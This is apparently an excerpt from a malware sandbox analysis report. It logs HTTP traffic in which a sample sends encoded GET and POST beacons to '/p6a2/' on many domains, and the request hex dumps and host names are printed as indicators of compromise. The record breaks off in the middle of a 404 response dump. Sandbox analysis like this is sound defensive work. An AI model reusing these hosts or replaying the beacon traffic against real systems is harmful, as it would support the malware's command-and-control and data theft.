                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=dUX/NCfS/ohFC7O80P17jduoKXecdoXu/c+jqkCFku2HIELrCmlysUdsWMmXDmnAL0wy8gVH6BIzEQuoLfScbNDGrSU7SZcpQA== HTTP/1.1Host: www.realtxt.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=v0jYY1ytl5PH6OIBhUa985ktrnV9EUxQvf0paGzXVH/pO6il62dTlsncR7GNVbW/vhBZVRhGCtJzQ8DjGp6vLGYCApLjgmmFaA==&4u=XXw8ZRfd0 HTTP/1.1Host: www.4tx.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=/9zhY/Qa6PbuzUJJeFENEisDBASeGLQuA2DsbQL1c4XMJeUN1UEfvc0JnTkLGaGl6hcCibpmZrBf1fZuQl6EVbtQGhHUTPfVDw==&4u=XXw8ZRfd0 HTTP/1.1Host: www.glb-mobility.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=pjY5HSUHAkIjJTnjTuXZqIQD+upstRzJTGdDpMtHb2G7EDTOYPy+SC0sAwePybO7Bg4lDq58C8rolUandfOM6VH00Jlr+bNPuQ== HTTP/1.1Host: www.adelaidesociety.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXfEa/HBDnsFpMkr8eF2T22317iGL4Q==&4u=XXw8ZRfd0 HTTP/1.1Host: www.newhard.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: Joe Sandbox ViewIP Address: 35.213.254.232 35.213.254.232
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.newhard.ruConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.newhard.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.newhard.ru/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 65 35 6d 38 34 30 68 58 37 39 52 65 28 6d 43 31 69 43 4b 78 4e 76 4b 61 31 63 64 70 52 6b 49 71 68 36 53 4f 39 31 35 50 77 70 47 4f 36 73 7e 39 68 4e 5a 55 6c 4b 35 38 54 67 6d 79 7a 77 48 57 4c 4f 4e 76 63 76 45 6f 7a 46 59 79 6d 63 77 6f 43 46 50 34 52 56 32 73 31 57 4c 52 39 43 7e 6a 7e 4f 31 32 32 65 48 65 6a 4d 68 4d 68 42 64 42 4b 47 70 74 7a 53 58 4d 7a 64 63 6e 32 6d 53 4a 45 52 33 63 6d 63 53 61 6d 4a 55 33 28 63 41 45 4f 44 79 4f 48 53 44 5a 4e 38 4f 39 71 36 73 31 6d 71 73 57 73 4a 79 4b 31 6a 45 62 6c 77 36 6b 48 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=e5m840hX79Re(mC1iCKxNvKa1cdpRkIqh6SO915PwpGO6s~9hNZUlK58TgmyzwHWLONvcvEozFYymcwoCFP4RV2s1WLR9C~j~O122eHejMhMhBdBKGptzSXMzdcn2mSJER3cmcSamJU3(cAEODyOHSDZN8O9q6s1mqsWsJyK1jEblw6kHQ).
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.loaddown.vipConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.loaddown.vipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.loaddown.vip/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 6c 32 41 73 4c 50 61 6c 70 48 65 4c 28 77 41 6b 55 51 6b 4e 39 56 4f 34 4a 45 41 6e 74 34 6c 37 4a 77 78 53 34 2d 41 75 32 79 69 61 54 59 79 67 4a 44 70 76 59 58 4b 72 58 59 59 65 6e 34 50 4b 6a 45 79 6c 67 41 36 30 74 46 52 31 6d 31 7e 4f 70 46 32 79 28 63 66 43 69 2d 48 55 57 54 45 38 30 70 54 48 57 32 58 39 76 44 59 73 34 77 4c 77 6d 72 47 36 56 6e 35 6b 62 64 6b 56 6b 7a 6f 6d 79 49 4c 52 4a 4c 43 66 78 6d 42 63 39 34 51 44 6f 4e 4d 56 28 4a 7a 58 50 4f 36 30 66 66 42 70 72 48 48 7a 30 37 78 63 66 49 34 51 56 4c 53 36 32 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=l2AsLPalpHeL(wAkUQkN9VO4JEAnt4l7JwxS4-Au2yiaTYygJDpvYXKrXYYen4PKjEylgA60tFR1m1~OpF2y(cfCi-HUWTE80pTHW2X9vDYs4wLwmrG6Vn5kbdkVkzomyILRJLCfxmBc94QDoNMV(JzXPO60ffBprHHz07xcfI4QVLS62g).
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.scastive.onlineConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.scastive.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.scastive.online/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 54 4c 78 56 7e 47 59 33 6b 57 78 49 69 47 62 5a 42 32 6e 7a 6b 66 48 68 31 5f 58 4e 68 44 37 70 63 66 64 68 4d 50 6a 38 30 64 30 4f 65 45 74 6f 77 4f 53 68 72 79 38 51 41 58 6c 62 4f 70 4e 4c 37 51 5a 73 4d 31 4e 73 51 73 36 79 6a 6a 66 71 4a 33 7e 49 6b 32 72 35 63 6c 78 58 7a 44 30 56 4d 75 57 46 48 74 50 71 4f 69 31 75 4b 32 64 6a 31 76 34 4d 7a 6c 38 6f 74 2d 55 65 6f 2d 49 35 6a 50 46 35 54 4d 41 7a 4f 39 6f 6b 65 49 41 66 72 42 36 56 56 77 52 66 56 74 7a 76 78 58 57 78 4a 5f 76 6c 70 4a 78 35 37 53 6a 55 74 56 28 49 39 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=TLxV~GY3kWxIiGbZB2nzkfHh1_XNhD7pcfdhMPj80d0OeEtowOShry8QAXlbOpNL7QZsM1NsQs6yjjfqJ3~Ik2r5clxXzD0VMuWFHtPqOi1uK2dj1v4Mzl8ot-Ueo-I5jPF5TMAzO9okeIAfrB6VVwRfVtzvxXWxJ_vlpJx57SjUtV(I9w).
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.dubmoviedaaa.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.dubmoviedaaa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dubmoviedaaa.com/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 47 49 37 4a 77 6e 38 75 52 70 65 37 4e 44 70 6f 75 4f 34 48 28 6d 4f 49 4a 4b 72 74 55 53 4d 31 46 4f 68 4e 33 68 34 69 28 30 4b 53 63 55 4c 43 42 59 77 64 54 61 78 49 48 70 46 53 39 2d 4d 72 48 65 65 32 67 31 7a 56 4f 4d 42 43 37 6e 56 68 69 2d 4c 4e 30 53 4f 6c 4d 55 59 74 38 72 4e 68 7a 32 70 6d 69 78 46 74 6d 74 32 72 4e 45 38 2d 6e 58 41 67 39 46 51 31 37 4d 38 50 78 64 68 67 58 63 32 32 39 65 68 47 6d 37 52 42 61 35 4a 39 74 6d 7e 30 68 43 37 65 52 66 67 4b 5a 5f 74 6d 4e 5a 4c 6b 61 6e 4f 6b 50 43 4a 39 76 57 5a 50 46 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=GI7Jwn8uRpe7NDpouO4H(mOIJKrtUSM1FOhN3h4i(0KScULCBYwdTaxIHpFS9-MrHee2g1zVOMBC7nVhi-LN0SOlMUYt8rNhz2pmixFtmt2rNE8-nXAg9FQ17M8PxdhgXc229ehGm7RBa5J9tm~0hC7eRfgKZ_tmNZLkanOkPCJ9vWZPFQ).
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.elite-travel-cn.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.elite-travel-cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.elite-travel-cn.com/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 38 63 6d 42 55 51 62 75 33 50 61 75 74 51 62 4f 4d 42 53 76 35 46 33 6d 79 44 79 55 74 33 44 5f 66 34 54 59 35 41 4d 42 59 77 44 64 4e 30 35 4e 57 5f 48 5a 54 53 6f 50 46 30 31 70 76 54 78 45 41 6a 38 5f 38 4c 33 4f 4a 65 6f 71 38 6a 79 41 69 65 41 51 55 56 6a 79 51 38 31 64 41 4b 64 52 6e 2d 42 4c 68 72 4c 31 48 50 62 68 37 6d 48 62 59 49 52 59 42 4b 47 35 63 4b 32 77 4f 72 61 4a 73 67 57 47 7a 77 28 73 4e 54 34 70 38 38 52 51 63 36 43 50 71 54 41 38 52 76 36 42 6a 57 36 72 69 4c 79 6a 58 30 57 39 46 37 76 42 4e 76 44 78 42 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=8cmBUQbu3PautQbOMBSv5F3myDyUt3D_f4TY5AMBYwDdN05NW_HZTSoPF01pvTxEAj8_8L3OJeoq8jyAieAQUVjyQ81dAKdRn-BLhrL1HPbh7mHbYIRYBKG5cK2wOraJsgWGzw(sNT4p88RQc6CPqTA8Rv6BjW6riLyjX0W9F7vBNvDxBA).
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.cobramierer.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.cobramierer.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cobramierer.com/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 6e 72 4d 33 6c 61 56 79 6c 32 50 4d 47 33 59 4e 45 74 52 67 77 78 46 37 50 38 53 48 32 6a 6c 58 52 4d 56 5a 33 59 6b 75 58 48 45 52 70 37 45 32 77 79 47 70 44 6d 44 48 35 61 53 50 30 30 68 4d 32 77 28 30 28 31 4e 63 4c 42 65 30 7e 62 6a 65 6f 35 46 50 6c 65 64 4c 4f 6d 65 76 46 6a 7e 59 48 66 77 32 65 66 5a 6d 6e 4a 31 47 59 67 76 37 69 6f 6c 78 48 75 4a 47 32 74 64 33 50 65 43 46 6c 33 5a 31 70 57 61 32 32 53 4f 31 38 78 51 58 7a 7a 4f 4e 72 63 6f 4c 62 61 56 7a 32 55 37 39 65 57 63 48 47 33 65 62 6a 69 37 4a 43 70 42 37 7a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=nrM3laVyl2PMG3YNEtRgwxF7P8SH2jlXRMVZ3YkuXHERp7E2wyGpDmDH5aSP00hM2w(0(1NcLBe0~bjeo5FPledLOmevFj~YHfw2efZmnJ1GYgv7iolxHuJG2td3PeCFl3Z1pWa22SO18xQXzzONrcoLbaVz2U79eWcHG3ebji7JCpB7zQ).
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.byfuture.bizConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.byfuture.bizUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.byfuture.biz/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 67 54 59 79 75 7a 78 5a 6e 36 74 42 4b 42 79 43 31 67 6b 42 51 67 77 64 63 4f 79 4c 6f 30 52 74 4a 35 37 4c 36 31 72 4e 50 34 53 68 42 68 58 69 62 31 73 34 37 56 77 64 35 72 45 55 32 6a 63 46 56 49 62 71 78 4e 52 50 4c 73 36 56 6d 68 75 4e 47 63 77 30 37 70 58 52 47 73 50 59 58 48 45 7a 28 4f 6d 4e 4f 2d 63 68 48 42 46 43 6e 61 62 75 72 6b 79 6d 44 62 28 2d 57 43 4b 61 48 58 50 33 70 43 54 72 44 56 79 6f 6d 56 6b 6c 7a 6c 4b 4e 61 7a 4e 37 53 45 6b 32 39 58 5a 63 74 43 4c 53 49 50 42 4d 56 34 62 64 63 47 7e 76 4c 46 59 55 57 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=gTYyuzxZn6tBKByC1gkBQgwdcOyLo0RtJ57L61rNP4ShBhXib1s47Vwd5rEU2jcFVIbqxNRPLs6VmhuNGcw07pXRGsPYXHEz(OmNO-chHBFCnaburkymDb(-WCKaHXP3pCTrDVyomVklzlKNazN7SEk29XZctCLSIPBMV4bdcG~vLFYUWQ).
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.forumhtc.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.forumhtc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.forumhtc.com/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 48 54 52 5a 71 64 47 71 63 30 6b 6b 61 65 76 39 32 6d 4b 4c 71 34 72 71 69 68 7a 61 41 2d 54 4d 64 6b 6b 36 62 47 56 36 28 51 39 37 4e 6d 65 4c 32 77 69 4e 61 50 51 5a 51 65 56 57 61 78 35 54 57 62 28 5f 31 46 74 71 46 39 43 59 53 4f 79 75 6c 74 6d 30 33 53 67 55 37 4d 28 30 50 52 28 35 59 42 69 56 65 35 41 78 54 39 69 56 36 70 62 43 43 70 79 55 49 52 46 68 28 43 79 79 28 44 36 36 63 68 51 38 55 42 46 52 57 41 34 30 39 61 63 66 52 79 42 71 7e 6d 48 59 34 61 37 7a 4d 43 4f 4f 50 5a 69 6d 76 69 4e 42 6a 65 67 49 32 4d 28 61 34 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=HTRZqdGqc0kkaev92mKLq4rqihzaA-TMdkk6bGV6(Q97NmeL2wiNaPQZQeVWax5TWb(_1FtqF9CYSOyultm03SgU7M(0PR(5YBiVe5AxT9iV6pbCCpyUIRFh(Cyy(D66chQ8UBFRWA409acfRyBq~mHY4a7zMCOOPZimviNBjegI2M(a4w).
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.3658622bet.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.3658622bet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3658622bet.com/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 55 62 4b 68 74 71 55 43 4b 31 7e 49 4c 41 51 76 34 4b 70 78 6e 75 51 4b 44 77 49 76 68 6f 65 44 57 45 42 71 63 6c 71 4a 4c 42 48 53 4e 42 54 42 75 65 55 49 37 55 33 62 6c 72 52 7a 44 30 4d 32 69 42 38 74 78 4a 74 4f 45 6f 32 4d 34 6c 68 4c 38 41 71 6e 4d 4d 4f 6f 33 4a 53 66 64 36 48 67 33 6b 45 6f 4b 31 41 36 72 32 55 30 37 72 64 30 7a 4e 45 78 56 58 30 65 28 4f 4e 61 6c 61 55 66 39 4d 47 5f 7a 76 59 59 33 36 57 6e 42 38 4e 55 41 77 41 58 74 7a 68 75 55 44 74 65 73 67 53 66 51 61 42 59 42 39 33 75 61 4c 57 62 7a 51 36 57 64 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=UbKhtqUCK1~ILAQv4KpxnuQKDwIvhoeDWEBqclqJLBHSNBTBueUI7U3blrRzD0M2iB8txJtOEo2M4lhL8AqnMMOo3JSfd6Hg3kEoK1A6r2U07rd0zNExVX0e(ONalaUf9MG_zvYY36WnB8NUAwAXtzhuUDtesgSfQaBYB93uaLWbzQ6WdQ).
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.bip39chain.infoConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.bip39chain.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bip39chain.info/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 74 73 77 6b 32 78 33 2d 6c 33 61 4f 50 42 7e 44 41 6b 73 49 41 77 68 75 68 71 6e 49 70 79 61 6f 72 72 51 63 6a 77 69 67 71 73 38 47 4a 48 43 78 58 30 64 31 6d 57 4f 79 45 41 4f 78 46 39 73 4e 61 64 4b 6b 54 70 45 54 4c 72 6e 53 6f 32 66 46 65 64 6f 36 42 4b 64 34 79 38 52 5a 51 64 56 57 53 76 68 2d 59 6d 46 2d 7a 6a 43 70 59 34 6d 32 63 4c 28 52 4d 6d 31 4b 4a 63 64 76 67 50 5a 69 4d 75 6d 43 68 61 4c 35 57 55 36 58 72 65 67 48 61 4c 36 74 57 64 36 6b 4c 70 55 6c 33 6f 39 2d 6d 35 51 70 6a 68 53 64 47 7a 52 34 7e 54 6a 51 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=tswk2x3-l3aOPB~DAksIAwhuhqnIpyaorrQcjwigqs8GJHCxX0d1mWOyEAOxF9sNadKkTpETLrnSo2fFedo6BKd4y8RZQdVWSvh-YmF-zjCpY4m2cL(RMm1KJcdvgPZiMumChaL5WU6XregHaL6tWd6kLpUl3o9-m5QpjhSdGzR4~TjQiA).
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.realtxt.co.ukConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.realtxt.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.realtxt.co.uk/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 51 57 28 66 4f 31 62 43 6d 5a 70 46 41 63 6d 56 30 65 74 41 36 5f 71 6b 44 6b 43 31 43 4a 4c 71 6e 65 28 55 38 55 7e 55 6a 5f 43 65 49 55 66 63 52 45 70 52 74 6b 4e 6c 62 2d 71 4b 59 47 33 58 4a 77 6c 6a 34 7a 35 58 78 44 4e 44 55 53 79 31 48 2d 53 69 4a 75 6e 4a 31 6a 77 59 44 4a 49 77 65 74 63 6d 4e 34 56 4d 77 4a 74 69 4b 64 31 70 4e 55 49 37 68 31 4e 42 38 41 6a 59 77 6c 6b 76 37 61 50 42 33 75 68 50 6c 6c 44 57 4e 7a 72 36 34 62 74 78 46 47 50 77 57 4c 50 30 33 6e 6e 37 4f 5f 7e 4a 69 6d 55 39 38 52 4b 58 69 56 57 48 66 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=QW(fO1bCmZpFAcmV0etA6_qkDkC1CJLqne(U8U~Uj_CeIUfcREpRtkNlb-qKYG3XJwlj4z5XxDNDUSy1H-SiJunJ1jwYDJIwetcmN4VMwJtiKd1pNUI7h1NB8AjYwlkv7aPB3uhPllDWNzr64btxFGPwWLP03nn7O_~JimU98RKXiVWHfA).
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.4tx.ruConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.4tx.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.4tx.ru/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 69 32 4c 34 62 46 4b 62 69 61 37 51 33 66 5a 55 6a 6e 71 69 6c 37 41 49 69 32 4e 48 63 6e 64 53 6e 2d 4e 55 4b 55 62 38 52 46 76 72 51 5a 58 2d 74 55 56 6d 6d 37 62 35 59 38 79 48 47 6f 43 51 74 43 78 71 64 41 46 47 47 4d 6f 4b 59 4e 76 45 4b 65 6d 33 49 30 6b 6b 41 37 7a 36 6e 31 6d 5f 63 38 34 68 4a 66 53 61 4a 78 4e 5a 53 42 45 72 71 73 4a 69 54 31 74 75 75 6a 75 65 33 70 47 74 73 70 69 61 39 30 47 52 70 72 74 68 33 48 79 56 6c 57 42 70 46 42 53 53 7a 47 43 70 68 76 67 76 69 41 4c 7a 6b 44 74 39 50 5f 6a 68 56 61 6d 43 7a 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=i2L4bFKbia7Q3fZUjnqil7AIi2NHcndSn-NUKUb8RFvrQZX-tUVmm7b5Y8yHGoCQtCxqdAFGGMoKYNvEKem3I0kkA7z6n1m_c84hJfSaJxNZSBErqsJiT1tuujue3pGtspia90GRprth3HyVlWBpFBSSzGCphvgviALzkDt9P_jhVamCzg).
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.glb-mobility.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.glb-mobility.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.glb-mobility.com/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 79 5f 62 42 62 4b 45 37 33 4e 50 35 38 6a 39 6f 4d 55 45 47 49 42 6c 6e 49 67 71 74 61 4a 59 57 41 32 65 5a 54 51 54 78 61 70 72 4d 48 2d 55 36 72 46 59 56 73 37 30 2d 73 51 6f 30 59 59 79 72 34 52 55 4a 79 37 35 4b 62 36 51 5f 7e 66 78 53 42 46 4f 34 51 49 46 31 43 79 57 4e 55 64 6a 36 64 58 61 71 59 41 39 4d 75 30 30 68 67 50 79 6a 28 7a 71 31 78 70 32 64 6c 42 44 36 78 4b 73 67 70 4f 37 44 42 7a 79 44 37 36 34 58 6d 73 33 58 43 53 4f 54 76 38 66 6f 77 78 61 4f 63 66 36 31 43 42 71 58 37 57 52 6f 35 57 62 6b 62 6f 4d 66 71 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=y_bBbKE73NP58j9oMUEGIBlnIgqtaJYWA2eZTQTxaprMH-U6rFYVs70-sQo0YYyr4RUJy75Kb6Q_~fxSBFO4QIF1CyWNUdj6dXaqYA9Mu00hgPyj(zq1xp2dlBD6xKsgpO7DBzyD764Xms3XCSOTv8fowxaOcf61CBqX7WRo5WbkboMfqA).
                Source: global trafficHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.newhard.ruConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.newhard.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.newhard.ru/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 65 35 6d 38 34 30 68 58 37 39 52 65 28 6d 43 31 69 43 4b 78 4e 76 4b 61 31 63 64 70 52 6b 49 71 68 36 53 4f 39 31 35 50 77 70 47 4f 36 73 7e 39 68 4e 5a 55 6c 4b 35 38 54 67 6d 79 7a 77 48 57 4c 4f 4e 76 63 76 45 6f 7a 46 59 79 6d 63 77 6f 43 46 50 34 52 56 32 73 31 57 4c 52 39 43 7e 6a 7e 4f 31 32 32 65 48 65 6a 4d 68 4d 68 42 64 42 4b 47 70 74 7a 53 58 4d 7a 64 63 6e 32 6d 53 4a 45 52 33 63 6d 63 53 61 6d 4a 55 33 28 63 41 45 4f 44 79 4f 48 53 44 5a 4e 38 4f 39 71 36 73 31 6d 71 73 57 73 4a 79 4b 31 6a 45 62 6c 77 36 6b 48 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=e5m840hX79Re(mC1iCKxNvKa1cdpRkIqh6SO915PwpGO6s~9hNZUlK58TgmyzwHWLONvcvEozFYymcwoCFP4RV2s1WLR9C~j~O122eHejMhMhBdBKGptzSXMzdcn2mSJER3cmcSamJU3(cAEODyOHSDZN8O9q6s1mqsWsJyK1jEblw6kHQ).
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
                Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Dec 2022 09:54:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 6b7412fb82ca5edfd0917e3957f05d89X-Proxy-Cache: MISSX-Proxy-Cache-Info: 0 NC:000000 UP:Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 